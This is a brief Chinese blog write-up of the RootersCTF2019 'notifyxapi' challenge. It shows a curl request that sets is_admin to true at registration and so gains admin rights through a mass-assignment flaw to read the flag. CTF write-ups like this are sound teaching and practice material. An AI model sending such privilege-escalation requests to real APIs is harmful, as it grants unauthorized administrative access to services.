[RootersCTF2019]notifyxapi

2021-10-22 12:41

|

0

|

216

|

70 字

|

1 分钟内

[RootersCTF2019]notifyxapi

解题步骤

直接把页面上的命令全运行一遍。然后发现is_admin:false，然后居然可以注册的时候带上！

curl -X POST "http://ba88ccc5-2757-4a5b-9af4-40afa6e69267.node4.buuoj.cn:81/api/v1/register/" -H "Content-Type: application/json" \
-d '{"email": "a@a.com", "password": "asd", "is_admin": "true"}'

然后直接就admin了，逆天了，然后登录看公告就可以得到flag

暂无评论

发送评论编辑评论

Markdown

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!